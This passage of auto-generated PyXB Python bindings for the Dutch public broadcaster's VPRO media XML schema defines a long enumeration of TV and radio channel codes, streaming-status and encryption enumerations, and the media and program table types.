channelEnum.RAIT = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAIT', tag='RAIT')
channelEnum.TEVE = channelEnum._CF_enumeration.addEnumeration(unicode_value='TEVE', tag='TEVE')
channelEnum.ERTS = channelEnum._CF_enumeration.addEnumeration(unicode_value='ERTS', tag='ERTS')
channelEnum.STV = channelEnum._CF_enumeration.addEnumeration(unicode_value='STV_', tag='STV')
channelEnum.NTV = channelEnum._CF_enumeration.addEnumeration(unicode_value='NTV_', tag='NTV')
channelEnum.TVPO = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVPO', tag='TVPO')
channelEnum.NOSJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='NOSJ', tag='NOSJ')
channelEnum.CULT = channelEnum._CF_enumeration.addEnumeration(unicode_value='CULT', tag='CULT')
channelEnum.n101 = channelEnum._CF_enumeration.addEnumeration(unicode_value='101_', tag='n101')
channelEnum.PO24 = channelEnum._CF_enumeration.addEnumeration(unicode_value='PO24', tag='PO24')
channelEnum.HILV = channelEnum._CF_enumeration.addEnumeration(unicode_value='HILV', tag='HILV')
channelEnum.HOLL = channelEnum._CF_enumeration.addEnumeration(unicode_value='HOLL', tag='HOLL')
channelEnum.GESC = channelEnum._CF_enumeration.addEnumeration(unicode_value='GESC', tag='GESC')
channelEnum.n3VCN = channelEnum._CF_enumeration.addEnumeration(unicode_value='3VCN', tag='n3VCN')
channelEnum.n3VOS = channelEnum._CF_enumeration.addEnumeration(unicode_value='3VOS', tag='n3VOS')
channelEnum.STER = channelEnum._CF_enumeration.addEnumeration(unicode_value='STER', tag='STER')
channelEnum.NCRV = channelEnum._CF_enumeration.addEnumeration(unicode_value='NCRV', tag='NCRV')
channelEnum.OPVO = channelEnum._CF_enumeration.addEnumeration(unicode_value='OPVO', tag='OPVO')
channelEnum.CONS = channelEnum._CF_enumeration.addEnumeration(unicode_value='CONS', tag='CONS')
channelEnum.HUMO = channelEnum._CF_enumeration.addEnumeration(unicode_value='HUMO', tag='HUMO')
channelEnum.ENTE = channelEnum._CF_enumeration.addEnumeration(unicode_value='ENTE', tag='ENTE')
channelEnum.FASH = channelEnum._CF_enumeration.addEnumeration(unicode_value='FASH', tag='FASH')
channelEnum.COMC = channelEnum._CF_enumeration.addEnumeration(unicode_value='COMC', tag='COMC')
channelEnum.TBN = channelEnum._CF_enumeration.addEnumeration(unicode_value='TBN_', tag='TBN')
channelEnum.DISC = channelEnum._CF_enumeration.addEnumeration(unicode_value='DISC', tag='DISC')
channelEnum.ZONE = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZONE', tag='ZONE')
channelEnum.ANPL = channelEnum._CF_enumeration.addEnumeration(unicode_value='ANPL', tag='ANPL')
channelEnum.CLUB = channelEnum._CF_enumeration.addEnumeration(unicode_value='CLUB', tag='CLUB')
channelEnum.NAGE = channelEnum._CF_enumeration.addEnumeration(unicode_value='NAGE', tag='NAGE')
channelEnum.TRAC = channelEnum._CF_enumeration.addEnumeration(unicode_value='TRAC', tag='TRAC')
channelEnum.NGHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='NGHD', tag='NGHD')
channelEnum.WILD = channelEnum._CF_enumeration.addEnumeration(unicode_value='WILD', tag='WILD')
channelEnum.GARU = channelEnum._CF_enumeration.addEnumeration(unicode_value='GARU', tag='GARU')
channelEnum.ZAZA = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZAZA', tag='ZAZA')
channelEnum.FAM7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FAM7', tag='FAM7')
channelEnum.DTAL = channelEnum._CF_enumeration.addEnumeration(unicode_value='DTAL', tag='DTAL')
channelEnum.SCIE = channelEnum._CF_enumeration.addEnumeration(unicode_value='SCIE', tag='SCIE')
channelEnum.CIVI = channelEnum._CF_enumeration.addEnumeration(unicode_value='CIVI', tag='CIVI')
channelEnum.DIHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='DIHD', tag='DIHD')
channelEnum.HIST = channelEnum._CF_enumeration.addEnumeration(unicode_value='HIST', tag='HIST')
channelEnum.TRAV = channelEnum._CF_enumeration.addEnumeration(unicode_value='TRAV', tag='TRAV')
channelEnum.HETG = channelEnum._CF_enumeration.addEnumeration(unicode_value='HETG', tag='HETG')
channelEnum.GOED = channelEnum._CF_enumeration.addEnumeration(unicode_value='GOED', tag='GOED')
channelEnum.BABY = channelEnum._CF_enumeration.addEnumeration(unicode_value='BABY', tag='BABY')
channelEnum.DH1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DH1_', tag='DH1')
channelEnum.LITV = channelEnum._CF_enumeration.addEnumeration(unicode_value='LITV', tag='LITV')
channelEnum.LIVE = channelEnum._CF_enumeration.addEnumeration(unicode_value='LIVE', tag='LIVE')
channelEnum.STAR = channelEnum._CF_enumeration.addEnumeration(unicode_value='STAR', tag='STAR')
channelEnum.WEER = channelEnum._CF_enumeration.addEnumeration(unicode_value='WEER', tag='WEER')
channelEnum.REAL = channelEnum._CF_enumeration.addEnumeration(unicode_value='REAL', tag='REAL')
channelEnum.SCIF = channelEnum._CF_enumeration.addEnumeration(unicode_value='SCIF', tag='SCIF')
channelEnum.n13ST = channelEnum._CF_enumeration.addEnumeration(unicode_value='13ST', tag='n13ST')
channelEnum.CARC = channelEnum._CF_enumeration.addEnumeration(unicode_value='CARC', tag='CARC')
channelEnum.NOSN = channelEnum._CF_enumeration.addEnumeration(unicode_value='NOSN', tag='NOSN')
channelEnum.HISH = channelEnum._CF_enumeration.addEnumeration(unicode_value='HISH', tag='HISH')
channelEnum.BRHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRHD', tag='BRHD')
channelEnum.FANT = channelEnum._CF_enumeration.addEnumeration(unicode_value='FANT', tag='FANT')
channelEnum.RACW = channelEnum._CF_enumeration.addEnumeration(unicode_value='RACW', tag='RACW')
channelEnum.COMF = channelEnum._CF_enumeration.addEnumeration(unicode_value='COMF', tag='COMF')
channelEnum.DIER = channelEnum._CF_enumeration.addEnumeration(unicode_value='DIER', tag='DIER')
channelEnum.POKE = channelEnum._CF_enumeration.addEnumeration(unicode_value='POKE', tag='POKE')
channelEnum.MNET = channelEnum._CF_enumeration.addEnumeration(unicode_value='MNET', tag='MNET')
channelEnum.VOOM = channelEnum._CF_enumeration.addEnumeration(unicode_value='VOOM', tag='VOOM')
channelEnum.ZONH = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZONH', tag='ZONH')
channelEnum.KPN1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN1', tag='KPN1')
channelEnum.KPN2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN2', tag='KPN2')
channelEnum.KPN3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN3', tag='KPN3')
channelEnum.KPN4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN4', tag='KPN4')
channelEnum.ZIZO = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZIZO', tag='ZIZO')
channelEnum.DVIC = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVIC', tag='DVIC')
channelEnum.DVB1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVB1', tag='DVB1')
channelEnum.DVB2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVB2', tag='DVB2')
channelEnum.DVB3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVB3', tag='DVB3')
channelEnum.NICK = channelEnum._CF_enumeration.addEnumeration(unicode_value='NICK', tag='NICK')
channelEnum.NIJN = channelEnum._CF_enumeration.addEnumeration(unicode_value='NIJN', tag='NIJN')
channelEnum.NIKT = channelEnum._CF_enumeration.addEnumeration(unicode_value='NIKT', tag='NIKT')
channelEnum.NIKH = channelEnum._CF_enumeration.addEnumeration(unicode_value='NIKH', tag='NIKH')
channelEnum.CART = channelEnum._CF_enumeration.addEnumeration(unicode_value='CART', tag='CART')
channelEnum.BOOM = channelEnum._CF_enumeration.addEnumeration(unicode_value='BOOM', tag='BOOM')
channelEnum.CNN = channelEnum._CF_enumeration.addEnumeration(unicode_value='CNN_', tag='CNN')
channelEnum.BBCW = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCW', tag='BBCW')
channelEnum.EURN = channelEnum._CF_enumeration.addEnumeration(unicode_value='EURN', tag='EURN')
channelEnum.SKNE = channelEnum._CF_enumeration.addEnumeration(unicode_value='SKNE', tag='SKNE')
channelEnum.BLOO = channelEnum._CF_enumeration.addEnumeration(unicode_value='BLOO', tag='BLOO')
channelEnum.CNBC = channelEnum._CF_enumeration.addEnumeration(unicode_value='CNBC', tag='CNBC')
channelEnum.PALJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='PALJ', tag='PALJ')
channelEnum.ALJA = channelEnum._CF_enumeration.addEnumeration(unicode_value='ALJA', tag='ALJA')
channelEnum.FOXN = channelEnum._CF_enumeration.addEnumeration(unicode_value='FOXN', tag='FOXN')
channelEnum.FXNL = channelEnum._CF_enumeration.addEnumeration(unicode_value='FXNL', tag='FXNL')
channelEnum.MTV = channelEnum._CF_enumeration.addEnumeration(unicode_value='MTV_', tag='MTV')
channelEnum.MTV2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='MTV2', tag='MTV2')
channelEnum.HITS = channelEnum._CF_enumeration.addEnumeration(unicode_value='HITS', tag='HITS')
channelEnum.BASE = channelEnum._CF_enumeration.addEnumeration(unicode_value='BASE', tag='BASE')
channelEnum.MTVB = channelEnum._CF_enumeration.addEnumeration(unicode_value='MTVB', tag='MTVB')
channelEnum.TMF = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMF_', tag='TMF')
channelEnum.TMFN = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMFN', tag='TMFN')
channelEnum.TMFP = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMFP', tag='TMFP')
channelEnum.TMFY = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMFY', tag='TMFY')
channelEnum.TVOR = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVOR', tag='TVOR')
channelEnum.VH1E = channelEnum._CF_enumeration.addEnumeration(unicode_value='VH1E', tag='VH1E')
channelEnum.VH1C = channelEnum._CF_enumeration.addEnumeration(unicode_value='VH1C', tag='VH1C')
channelEnum.PERC = channelEnum._CF_enumeration.addEnumeration(unicode_value='PERC', tag='PERC')
channelEnum.MEZZ = channelEnum._CF_enumeration.addEnumeration(unicode_value='MEZZ', tag='MEZZ')
channelEnum.EURO = channelEnum._CF_enumeration.addEnumeration(unicode_value='EURO', tag='EURO')
channelEnum.EUR2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='EUR2', tag='EUR2')
channelEnum.EXTR = channelEnum._CF_enumeration.addEnumeration(unicode_value='EXTR', tag='EXTR')
channelEnum.MOTO = channelEnum._CF_enumeration.addEnumeration(unicode_value='MOTO', tag='MOTO')
channelEnum.SAIL = channelEnum._CF_enumeration.addEnumeration(unicode_value='SAIL', tag='SAIL')
channelEnum.ESPN = channelEnum._CF_enumeration.addEnumeration(unicode_value='ESPN', tag='ESPN')
channelEnum.NASE = channelEnum._CF_enumeration.addEnumeration(unicode_value='NASE', tag='NASE')
channelEnum.SP11 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP11', tag='SP11')
channelEnum.SP12 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP12', tag='SP12')
channelEnum.SP13 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP13', tag='SP13')
channelEnum.SP14 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP14', tag='SP14')
channelEnum.SP15 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP15', tag='SP15')
channelEnum.SP16 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP16', tag='SP16')
channelEnum.SP17 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP17', tag='SP17')
channelEnum.SP18 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP18', tag='SP18')
channelEnum.S1HD = channelEnum._CF_enumeration.addEnumeration(unicode_value='S1HD', tag='S1HD')
channelEnum.FIL1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FIL1', tag='FIL1')
channelEnum.FIL2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FIL2', tag='FIL2')
channelEnum.FIL3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FIL3', tag='FIL3')
channelEnum.FL11 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL11', tag='FL11')
channelEnum.FL1P = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL1P', tag='FL1P')
channelEnum.FL12 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL12', tag='FL12')
channelEnum.FL13 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL13', tag='FL13')
channelEnum.FLHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='FLHD', tag='FLHD')
channelEnum.MGMM = channelEnum._CF_enumeration.addEnumeration(unicode_value='MGMM', tag='MGMM')
channelEnum.TCM = channelEnum._CF_enumeration.addEnumeration(unicode_value='TCM_', tag='TCM')
channelEnum.HALL = channelEnum._CF_enumeration.addEnumeration(unicode_value='HALL', tag='HALL')
channelEnum.ACNW = channelEnum._CF_enumeration.addEnumeration(unicode_value='ACNW', tag='ACNW')
channelEnum.RHUS = channelEnum._CF_enumeration.addEnumeration(unicode_value='RHUS', tag='RHUS')
channelEnum.PLAY = channelEnum._CF_enumeration.addEnumeration(unicode_value='PLAY', tag='PLAY')
channelEnum.ADUL = channelEnum._CF_enumeration.addEnumeration(unicode_value='ADUL', tag='ADUL')
channelEnum.PSPI = channelEnum._CF_enumeration.addEnumeration(unicode_value='PSPI', tag='PSPI')
channelEnum.HUST = channelEnum._CF_enumeration.addEnumeration(unicode_value='HUST', tag='HUST')
channelEnum.OXMO = channelEnum._CF_enumeration.addEnumeration(unicode_value='OXMO', tag='OXMO')
channelEnum.XM24 = channelEnum._CF_enumeration.addEnumeration(unicode_value='XM24', tag='XM24')
channelEnum.OU24 = channelEnum._CF_enumeration.addEnumeration(unicode_value='OU24', tag='OU24')
channelEnum.RAD1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD1', tag='RAD1')
channelEnum.RAD2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD2', tag='RAD2')
channelEnum.R2SJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='R2SJ', tag='R2SJ')
channelEnum.RAD3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD3', tag='RAD3')
channelEnum.R3KX = channelEnum._CF_enumeration.addEnumeration(unicode_value='R3KX', tag='R3KX')
channelEnum.R3AL = channelEnum._CF_enumeration.addEnumeration(unicode_value='R3AL', tag='R3AL')
channelEnum.RAD4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD4', tag='RAD4')
channelEnum.R4CO = channelEnum._CF_enumeration.addEnumeration(unicode_value='R4CO', tag='R4CO')
channelEnum.RAD5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD5', tag='RAD5')
channelEnum.R5ST = channelEnum._CF_enumeration.addEnumeration(unicode_value='R5ST', tag='R5ST')
channelEnum.RAD6 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD6', tag='RAD6')
channelEnum.REGR = channelEnum._CF_enumeration.addEnumeration(unicode_value='REGR', tag='REGR')
channelEnum.RFRY = channelEnum._CF_enumeration.addEnumeration(unicode_value='RFRY', tag='RFRY')
channelEnum.DRRD = channelEnum._CF_enumeration.addEnumeration(unicode_value='DRRD', tag='DRRD')
channelEnum.RNOO = channelEnum._CF_enumeration.addEnumeration(unicode_value='RNOO', tag='RNOO')
channelEnum.ROST = channelEnum._CF_enumeration.addEnumeration(unicode_value='ROST', tag='ROST')
channelEnum.RGEL = channelEnum._CF_enumeration.addEnumeration(unicode_value='RGEL', tag='RGEL')
channelEnum.RFLE = channelEnum._CF_enumeration.addEnumeration(unicode_value='RFLE', tag='RFLE')
channelEnum.RBRA = channelEnum._CF_enumeration.addEnumeration(unicode_value='RBRA', tag='RBRA')
channelEnum.RUTR = channelEnum._CF_enumeration.addEnumeration(unicode_value='RUTR', tag='RUTR')
channelEnum.RNOH = channelEnum._CF_enumeration.addEnumeration(unicode_value='RNOH', tag='RNOH')
channelEnum.RWST = channelEnum._CF_enumeration.addEnumeration(unicode_value='RWST', tag='RWST')
channelEnum.RRIJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='RRIJ', tag='RRIJ')
channelEnum.LRAD = channelEnum._CF_enumeration.addEnumeration(unicode_value='LRAD', tag='LRAD')
channelEnum.RZEE = channelEnum._CF_enumeration.addEnumeration(unicode_value='RZEE', tag='RZEE')
channelEnum.COMM = channelEnum._CF_enumeration.addEnumeration(unicode_value='COMM', tag='COMM')
channelEnum.RVER = channelEnum._CF_enumeration.addEnumeration(unicode_value='RVER', tag='RVER')
channelEnum.SLAM = channelEnum._CF_enumeration.addEnumeration(unicode_value='SLAM', tag='SLAM')
channelEnum.SKYR = channelEnum._CF_enumeration.addEnumeration(unicode_value='SKYR', tag='SKYR')
channelEnum.BNRN = channelEnum._CF_enumeration.addEnumeration(unicode_value='BNRN', tag='BNRN')
channelEnum.KINK = channelEnum._CF_enumeration.addEnumeration(unicode_value='KINK', tag='KINK')
channelEnum.PCAZ = channelEnum._CF_enumeration.addEnumeration(unicode_value='PCAZ', tag='PCAZ')
channelEnum.QMUS = channelEnum._CF_enumeration.addEnumeration(unicode_value='QMUS', tag='QMUS')
channelEnum.R538 = channelEnum._CF_enumeration.addEnumeration(unicode_value='R538', tag='R538')
channelEnum.GOLD = channelEnum._CF_enumeration.addEnumeration(unicode_value='GOLD', tag='GOLD')
channelEnum.ARRO = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARRO', tag='ARRO')
channelEnum.FUNX = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNX', tag='FUNX')
channelEnum.FUNA = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNA', tag='FUNA')
channelEnum.FUNR = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNR', tag='FUNR')
channelEnum.FUNU = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNU', tag='FUNU')
channelEnum.FUNG = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNG', tag='FUNG')
channelEnum.FUNB = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNB', tag='FUNB')
channelEnum.FUND = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUND', tag='FUND')
channelEnum.FUNH = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNH', tag='FUNH')
channelEnum.FUNL = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNL', tag='FUNL')
channelEnum.FUNJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNJ', tag='FUNJ')
channelEnum.FUNS = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNS', tag='FUNS')
channelEnum.FUNF = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNF', tag='FUNF')
channelEnum.CLAS = channelEnum._CF_enumeration.addEnumeration(unicode_value='CLAS', tag='CLAS')
channelEnum.BEL1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BEL1', tag='BEL1')
channelEnum.BEL2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BEL2', tag='BEL2')
channelEnum.KLAR = channelEnum._CF_enumeration.addEnumeration(unicode_value='KLAR', tag='KLAR')
channelEnum.BBR1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR1', tag='BBR1')
channelEnum.BBR2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR2', tag='BBR2')
channelEnum.BBR3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR3', tag='BBR3')
channelEnum.BBR4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR4', tag='BBR4')
channelEnum.BBWS = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBWS', tag='BBWS')
channelEnum.BBCX = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCX', tag='BBCX')
channelEnum.NDR3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NDR3', tag='NDR3')
channelEnum.WDR4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='WDR4', tag='WDR4')
channelEnum.WDR3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='WDR3', tag='WDR3')
channelEnum.ONL1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='ONL1', tag='ONL1')
channelEnum.OMEG = channelEnum._CF_enumeration.addEnumeration(unicode_value='OMEG', tag='OMEG')
channelEnum.D24K = channelEnum._CF_enumeration.addEnumeration(unicode_value='D24K', tag='D24K')
channelEnum.H1NL = channelEnum._CF_enumeration.addEnumeration(unicode_value='H1NL', tag='H1NL')
channelEnum.SYFY = channelEnum._CF_enumeration.addEnumeration(unicode_value='SYFY', tag='SYFY')
channelEnum.SBS9 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SBS9', tag='SBS9')
channelEnum.DIXD = channelEnum._CF_enumeration.addEnumeration(unicode_value='DIXD', tag='DIXD')
channelEnum.BRNL = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRNL', tag='BRNL')
channelEnum.FOXL = channelEnum._CF_enumeration.addEnumeration(unicode_value='FOXL', tag='FOXL')
channelEnum.TLC = channelEnum._CF_enumeration.addEnumeration(unicode_value='TLC_', tag='TLC')
channelEnum.BCFS = channelEnum._CF_enumeration.addEnumeration(unicode_value='BCFS', tag='BCFS')
channelEnum.AMC = channelEnum._CF_enumeration.addEnumeration(unicode_value='AMC_', tag='AMC')
channelEnum.FLM1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FLM1', tag='FLM1')
channelEnum.ZGS1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZGS1', tag='ZGS1')
channelEnum.BRTZ = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRTZ', tag='BRTZ')
channelEnum.RTLF = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTLF', tag='RTLF')
channelEnum.TVDR = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVDR', tag='TVDR')
channelEnum.VRTC = channelEnum._CF_enumeration.addEnumeration(unicode_value='VRTC', tag='VRTC')
channelEnum.n10TB = channelEnum._CF_enumeration.addEnumeration(unicode_value='10TB', tag='n10TB')
channelEnum.XXXX = channelEnum._CF_enumeration.addEnumeration(unicode_value='XXXX', tag='XXXX')
channelEnum._InitializeFacetMap(channelEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'channelEnum', channelEnum)
_module_typeBindings.channelEnum = channelEnum
# Atomic simple type: {urn:vpro:media:2009}streamingStatusValue
class streamingStatusValue (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'streamingStatusValue')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3246, 2)
_Documentation = None
streamingStatusValue._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=streamingStatusValue, enum_prefix=None)
streamingStatusValue.OFFLINE = streamingStatusValue._CF_enumeration.addEnumeration(unicode_value='OFFLINE', tag='OFFLINE')
streamingStatusValue.ONLINE = streamingStatusValue._CF_enumeration.addEnumeration(unicode_value='ONLINE', tag='ONLINE')
streamingStatusValue.UNSET = streamingStatusValue._CF_enumeration.addEnumeration(unicode_value='UNSET', tag='UNSET')
streamingStatusValue._InitializeFacetMap(streamingStatusValue._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'streamingStatusValue', streamingStatusValue)
_module_typeBindings.streamingStatusValue = streamingStatusValue
# Atomic simple type: {urn:vpro:media:2009}encryption
class encryption (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'encryption')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3254, 2)
_Documentation = None
encryption._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=encryption, enum_prefix=None)
encryption.NONE = encryption._CF_enumeration.addEnumeration(unicode_value='NONE', tag='NONE')
encryption.DRM = encryption._CF_enumeration.addEnumeration(unicode_value='DRM', tag='DRM')
encryption._InitializeFacetMap(encryption._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'encryption', encryption)
_module_typeBindings.encryption = encryption
# Complex type {urn:vpro:media:2009}mediaTableType with content type ELEMENT_ONLY
class mediaTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}mediaTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'mediaTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 57, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}schedule uses Python identifier schedule
__schedule = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'schedule'), 'schedule', '__urnvpromedia2009_mediaTableType_urnvpromedia2009schedule', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 46, 2), )
schedule = property(__schedule.value, __schedule.set, None, "\n Programs of type 'BROADCAST' can contain schedule events. A schedule indicates on which channel and at what time the program is broadcast. A schedule is a container which contains the schedule events of different programs, for a certain period of time.\n ")
# Element {urn:vpro:media:2009}programTable uses Python identifier programTable
__programTable = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'programTable'), 'programTable', '__urnvpromedia2009_mediaTableType_urnvpromedia2009programTable', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6), )
programTable = property(__programTable.value, __programTable.set, None, 'A table with all program objects in this container')
# Element {urn:vpro:media:2009}groupTable uses Python identifier groupTable
__groupTable = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'groupTable'), 'groupTable', '__urnvpromedia2009_mediaTableType_urnvpromedia2009groupTable', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6), )
groupTable = property(__groupTable.value, __groupTable.set, None, 'A table with all group objects in this container')
# Element {urn:vpro:media:2009}locationTable uses Python identifier locationTable
__locationTable = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'locationTable'), 'locationTable', '__urnvpromedia2009_mediaTableType_urnvpromedia2009locationTable', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6), )
locationTable = property(__locationTable.value, __locationTable.set, None, None)
# Attribute publisher uses Python identifier publisher
__publisher = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publisher'), 'publisher', '__urnvpromedia2009_mediaTableType_publisher', pyxb.binding.datatypes.string)
__publisher._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 76, 4)
__publisher._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 76, 4)
publisher = property(__publisher.value, __publisher.set, None, None)
# Attribute publicationTime uses Python identifier publicationTime
__publicationTime = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publicationTime'), 'publicationTime', '__urnvpromedia2009_mediaTableType_publicationTime', pyxb.binding.datatypes.dateTime)
__publicationTime._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 77, 4)
__publicationTime._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 77, 4)
publicationTime = property(__publicationTime.value, __publicationTime.set, None, None)
# Attribute version uses Python identifier version
__version = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'version'), 'version', '__urnvpromedia2009_mediaTableType_version', pyxb.binding.datatypes.short)
__version._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 78, 4)
__version._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 78, 4)
version = property(__version.value, __version.set, None, None)
_ElementMap.update({
__schedule.name() : __schedule,
__programTable.name() : __programTable,
__groupTable.name() : __groupTable,
__locationTable.name() : __locationTable
})
_AttributeMap.update({
__publisher.name() : __publisher,
__publicationTime.name() : __publicationTime,
__version.name() : __version
})
_module_typeBindings.mediaTableType = mediaTableType
Namespace.addCategoryObject('typeBinding', 'mediaTableType', mediaTableType)
# Complex type {urn:vpro:media:2009}programTableType with content type ELEMENT_ONLY
class programTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}programTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'programTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 81, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}program uses Python identifier program
__program = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'program'), 'program', '__urnvpromedia2009_programTableType_urnvpromedia2009program', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 25, 2), )
